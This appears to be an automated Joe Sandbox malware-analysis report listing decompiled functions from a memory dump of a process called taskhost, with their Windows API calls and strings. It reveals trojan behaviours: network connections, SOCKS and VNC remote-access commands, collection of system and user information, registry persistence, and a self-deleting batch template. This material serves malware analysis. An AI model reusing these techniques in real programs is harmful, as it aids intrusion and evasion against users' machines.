Part of subcall function 011A65B7: #19.WS2_32(?,?,00000000,00000000), ref: 011A661A
Part of subcall function 011A65B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 011A6657

Part of subcall function 011A675E: shutdown.WS2_32(?,00000002), ref: 011A6766
Part of subcall function 011A675E: #3.WS2_32(?), ref: 011A676D

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 011A67CC

Part of subcall function 011A6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 011A67A7

Part of subcall function 011A6403: socket.WS2_32(?,00000001,00000006), ref: 011A640C
Part of subcall function 011A6403: connect.WS2_32(00000000,?,-0000001D), ref: 011A642C
Part of subcall function 011A6403: #3.WS2_32(00000000,?,?,?,01197518,?), ref: 011A6437

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AA6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 011AA594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 011AA5F4

Part of subcall function 011A1049: EnterCriticalSection.KERNEL32(hL?), ref: 011A1064
Part of subcall function 011A1049: LeaveCriticalSection.KERNEL32(hL?), ref: 011A10E7
Part of subcall function 011A1049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 011A11B2
Part of subcall function 011A1049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 011A13EC

SetLastError.KERNEL32(00002F78), ref: 011AA6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 011AA762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 011AA77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 011AA795
EnterCriticalSection.KERNEL32(011B3F24), ref: 011AA79D
LeaveCriticalSection.KERNEL32(011B3F24,?), ref: 011AA853

Part of subcall function 011A5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 011A506A
Part of subcall function 011A5048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 011A508C
Part of subcall function 011A5048: InternetCloseHandle.WININET(?), ref: 011A5094

Part of subcall function 011A1C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 011A1C81
Part of subcall function 011A1C3C: CloseHandle.KERNEL32(?), ref: 011A1C9A

EnterCriticalSection.KERNEL32(011B3F24), ref: 011AA87A
LeaveCriticalSection.KERNEL32(011B3F24,?), ref: 011AA8BA

Part of subcall function 011A9C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,011B3F24,011AA893,?), ref: 011A9CB1

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0119B130
ReleaseMutex.KERNEL32(?), ref: 0119B14F
GetWindowRect.USER32(?,?), ref: 0119B15C
IsRectEmpty.USER32(?), ref: 0119B1E0
GetWindowLongW.USER32(?,000000F0), ref: 0119B1EF
GetParent.USER32(?), ref: 0119B205
MapWindowPoints.USER32(00000000,00000000), ref: 0119B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0119B232

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A1049, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395

APIs

EnterCriticalSection.KERNEL32(hL?), ref: 011A1064
LeaveCriticalSection.KERNEL32(hL?), ref: 011A10E7
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 011A11B2

Part of subcall function 011AAE54: EnterCriticalSection.KERNEL32(011B3FB4,?,011A11CF,?), ref: 011AAE5B
Part of subcall function 011AAE54: LeaveCriticalSection.KERNEL32(011B3FB4), ref: 011AAE90

Part of subcall function 011AAE9A: EnterCriticalSection.KERNEL32(011B3FB4,?,00000000,011A13AE,00000000), ref: 011AAEA6
Part of subcall function 011AAE9A: LeaveCriticalSection.KERNEL32(011B3FB4), ref: 011AAEF1

InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 011A13EC

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A0AA1: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0C73
Part of subcall function 011A0AA1: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0C93
Part of subcall function 011A0AA1: RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0CA6
Part of subcall function 011A0AA1: GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 011A0CB5

Part of subcall function 011A9B3E: CreateMutexW.KERNEL32(Function_00022C30,00000000,011B3F40,?,?,?,011979E5), ref: 011A9B66

Strings

, xrefs: 011A1301
hL?, xrefs: 011A1055, 011A105C, 011A10E6

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 011A8737: GetTempPathW.KERNEL32(000000F6,?), ref: 011A874E

CharToOemW.USER32(?,?), ref: 011A4EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 011A4F2F

Part of subcall function 011A8716: SetFileAttributesW.KERNELBASE(00000080,00000080,011AB4CD,?), ref: 011A871F
Part of subcall function 011A8716: DeleteFileW.KERNELBASE(?), ref: 011A8729

Part of subcall function 011A856B: CreateFileW.KERNEL32(011A4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 011A8585
Part of subcall function 011A856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 011A85A8
Part of subcall function 011A856B: CloseHandle.KERNEL32(00000000), ref: 011A85B5

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Strings

ComSpec, xrefs: 011A4F2A
/c "%s", xrefs: 011A4F01
bat, xrefs: 011A4E8B
@echo off%sdel /F "%s", xrefs: 011A4EBE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 011A797D
PathAddBackslashW.SHLWAPI(?), ref: 011A7994
PathRemoveBackslashW.SHLWAPI(?), ref: 011A79A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 011A79B2
PathAddBackslashW.SHLWAPI(?), ref: 011A79C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 011A79D2
CLSIDFromString.OLE32(?,?), ref: 011A79EC

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A78D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 011A78FD

Part of subcall function 011A773A: CharUpperW.USER32(00000000), ref: 011A785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 011A792F
RegCloseKey.ADVAPI32(?), ref: 011A7938
RegCloseKey.ADVAPI32(?), ref: 011A7952

Strings

d, xrefs: 011A7943
SOFTWARE\Microsoft, xrefs: 011A78F0

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 0119B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 0119B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 0119B3B2

Part of subcall function 0119B23D: GetTickCount.KERNEL32 ref: 0119B2A3
Part of subcall function 0119B23D: GetClassLongW.USER32(?,000000E6), ref: 0119B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 0119B448
PostMessageW.USER32(?,00000112,?,?), ref: 0119B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0119B4DA

Part of subcall function 0119B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0119B0B3
Part of subcall function 0119B0AD: ReleaseMutex.KERNEL32(?), ref: 0119B0E7
Part of subcall function 0119B0AD: IsWindow.USER32(?), ref: 0119B0EE
Part of subcall function 0119B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 0119B108
Part of subcall function 0119B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 0119B110

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01199694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01199709
StrStrIW.SHLWAPI(?,?), ref: 01199796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 011997BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 011997DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 0119980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 0119982D

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AA3B1, Relevance: 9.2, APIs: 6, Instructions: 153

APIs

EnterCriticalSection.KERNEL32(011B3F24), ref: 011AA3C2
LeaveCriticalSection.KERNEL32(011B3F24), ref: 011AA425

Part of subcall function 011AA298: ResetEvent.KERNEL32(?), ref: 011AA2A6
Part of subcall function 011AA298: InternetSetStatusCallbackW.WININET(?,011AA24F), ref: 011AA2DB
Part of subcall function 011AA298: InternetReadFileExA.WININET ref: 011AA31B
Part of subcall function 011AA298: GetLastError.KERNEL32 ref: 011AA325
Part of subcall function 011AA298: InternetSetStatusCallbackW.WININET(?,?), ref: 011AA389

EnterCriticalSection.KERNEL32(011B3F24), ref: 011AA442
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 011AA4C6

Part of subcall function 011A856B: CreateFileW.KERNEL32(011A4E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 011A8585
Part of subcall function 011A856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 011A85A8
Part of subcall function 011A856B: CloseHandle.KERNEL32(00000000), ref: 011A85B5

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 011A5505
Part of subcall function 011A54F1: GetLastError.KERNEL32 ref: 011A550F
Part of subcall function 011A54F1: InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 011A552F

Part of subcall function 011A14C3: InternetCrackUrlA.WININET ref: 011A17AC
Part of subcall function 011A14C3: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 011A17CA
Part of subcall function 011A14C3: GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 011A18E4
Part of subcall function 011A14C3: EnterCriticalSection.KERNEL32(hL?), ref: 011A1910
Part of subcall function 011A14C3: LeaveCriticalSection.KERNEL32(hL?,?,?), ref: 011A194D

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

SetLastError.KERNEL32(00002EE4), ref: 011AA51C
LeaveCriticalSection.KERNEL32(011B3F24), ref: 011AA585

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119929D, Relevance: 9.1, APIs: 6, Instructions: 148

APIs

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 011992D4
StrStrIW.SHLWAPI(?,?), ref: 0119935C
StrStrIW.SHLWAPI(?,?), ref: 0119936D
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01199389
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 011993A7
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 011993C1

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AD325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 011A2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 011A28A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 011AD34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 011AD35D

Part of subcall function 011AC86B: SetEvent.KERNEL32(011AD36D,00000000), ref: 011AC871
Part of subcall function 011AC86B: WaitForSingleObject.KERNEL32(000000E4,000000FF), ref: 011AC884

Part of subcall function 0119BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 0119BCEC
Part of subcall function 0119BCAF: Sleep.KERNEL32(000001F4), ref: 0119BCFB
Part of subcall function 0119BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0119BD11

Part of subcall function 011A8A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 011A8A5A
Part of subcall function 011A8A29: FindNextFileW.KERNEL32(00000000,?), ref: 011A8AB5
Part of subcall function 011A8A29: FindClose.KERNEL32(00000000), ref: 011A8AC0
Part of subcall function 011A8A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 011A8ACC
Part of subcall function 011A8A29: RemoveDirectoryW.KERNEL32(?), ref: 011A8AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 011AD39B
CharToOemW.USER32(?,?), ref: 011AD3B7
CharToOemW.USER32(?,?), ref: 011AD3C6

Part of subcall function 011A40F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 011A410D

ExitProcess.KERNEL32(00000000), ref: 011AD41C

Part of subcall function 011A4E7B: CharToOemW.USER32(?,?), ref: 011A4EAB
Part of subcall function 011A4E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 011A4F2F

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A51FD, Relevance: 9.1, APIs: 6, Instructions: 74

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 011A521D

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

WaitForSingleObject.KERNEL32(?,00000000), ref: 011A524B
InternetReadFile.WININET(00001000,?,00001000,?), ref: 011A5267
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 011A5282
FlushFileBuffers.KERNEL32(00000000), ref: 011A52A2

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

CloseHandle.KERNEL32(00000000), ref: 011A52B5

Part of subcall function 011A8716: SetFileAttributesW.KERNELBASE(00000080,00000080,011AB4CD,?), ref: 011A871F
Part of subcall function 011A8716: DeleteFileW.KERNELBASE(?), ref: 011A8729

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 011A7B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 011A7B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 011A7B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 011A7B72
GetWindowLongW.USER32(?,000000F0), ref: 011A7B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 011A7B9D

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01195A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 01195B1C

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

TlsGetValue.KERNEL32 ref: 01195AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 01195AD4
SaveDC.GDI32(?), ref: 01195AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 01195AF4
RestoreDC.GDI32(?,00000000), ref: 01195B06

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01196010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,?,00002719,00020000,?,?,00000000,00000000), ref: 0119610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 011961E6

Part of subcall function 011970A6: GetVersionExW.KERNEL32(?,00000002,00000000,00000006), ref: 011970CA
Part of subcall function 011970A6: GetNativeSystemInfo.KERNEL32(?), ref: 011970D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,00000002,?,00000000,00000000), ref: 01196162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,00000000,00000000), ref: 011961A4

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A34BD: GetSystemTime.KERNEL32(?,?,?,011960C8,?,00000000,00000000), ref: 011A34C7
Part of subcall function 011A34BD: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,011960C8,?,00000000,00000000), ref: 011A34D5

Part of subcall function 011A34E5: GetTimeZoneInformation.KERNELBASE(?), ref: 011A34F4

Strings

, xrefs: 01196218

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01197125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 01197138

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 011971C0

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

PathUnquoteSpacesW.SHLWAPI(?), ref: 011971A0
ExpandEnvironmentStringsW.KERNEL32(?,011AD23A,00000104), ref: 011971AD

Strings

.exe, xrefs: 01197147

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(01F1FED0,00000001,00000000,00000000,00000000), ref: 011A4FA6
InternetSetOptionA.WININET(00000000,00000002,011B200C,00000004), ref: 011A4FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 011A4FE2
InternetCloseHandle.WININET(00000000), ref: 011A4FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 011A4F97, 011A4FA5

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 011974BE
lstrcmpiA.KERNEL32(?,vnc), ref: 011974D1

Part of subcall function 011A7425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A7444
Part of subcall function 011A7425: CloseHandle.KERNEL32(?), ref: 011A7450

Part of subcall function 011A7477: SetLastError.KERNEL32(0000009B,011A2AC8,00000000,0119BB5F,00000000,011B2AF0,00000000,00000104,76C605D7,00000000), ref: 011A7481
Part of subcall function 011A7477: CreateThread.KERNEL32(00000000,011B2AF0,011B2AF0,011B2AF0,00000000,00000000), ref: 011A74A4

Part of subcall function 011A675E: shutdown.WS2_32(?,00000002), ref: 011A6766
Part of subcall function 011A675E: #3.WS2_32(?), ref: 011A676D

Part of subcall function 011A74BC: WaitForMultipleObjects.KERNEL32(?,011B2AEC,00000001,000000FF), ref: 011A74CE

CloseHandle.KERNEL32(?), ref: 011976EE

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Part of subcall function 011A6444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 011A6463
Part of subcall function 011A6444: freeaddrinfo.WS2_32(?,76C53E72,?,?,?,01197518,?), ref: 011A64B0

Part of subcall function 011A67B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 011A67CC

Part of subcall function 011A6774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 011A67A7

Part of subcall function 011A666B: select.WS2_32(00000000,?,00000000,00000000,?), ref: 011A66EA
Part of subcall function 011A666B: WSASetLastError.WS2_32(0000274C), ref: 011A66F9

Part of subcall function 011A636E: recv.WS2_32(?,?,00000004,00000000), ref: 011A6392

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

Strings

socks, xrefs: 011974B7
vnc, xrefs: 011974CA

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01199D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 01199E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 01199E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 01199ED7

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A7607: RegQueryValueExW.KERNEL32(?,?,00000000,?,011A9E26,?,?,?,011A75CD,?,?,00000000,00000004,?), ref: 011A761F
Part of subcall function 011A7607: RegCloseKey.KERNEL32(?,?,011A75CD,?,?,00000000,00000004,?,?,?,?,011A9E26,?,?), ref: 011A762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 01199F7A
RegCloseKey.ADVAPI32(?), ref: 01199F8D

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01198E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01198E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 01198F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 01198F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 01198F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 01198F7B

Part of subcall function 011A40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 011A40CF

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A9959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

GetDIBits.GDI32(00000000,0119DE4B,00000000,00000001,00000000,00000000,00000000), ref: 011A9991
GetDIBits.GDI32(00000000,0119DE4B,00000000,00000001,00000000,00000000,00000000), ref: 011A99A7
DeleteObject.GDI32(0119DE4B), ref: 011A99B4
CreateDIBSection.GDI32(00000000,00000000,00000000,011B2888,?,?), ref: 011A9A24

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

DeleteObject.GDI32(0119DE4B), ref: 011A9A43

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AA298, Relevance: 7.6, APIs: 5, Instructions: 94

APIs

ResetEvent.KERNEL32(?), ref: 011AA2A6

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

InternetSetStatusCallbackW.WININET(?,011AA24F), ref: 011AA2DB
InternetReadFileExA.WININET ref: 011AA31B
GetLastError.KERNEL32 ref: 011AA325

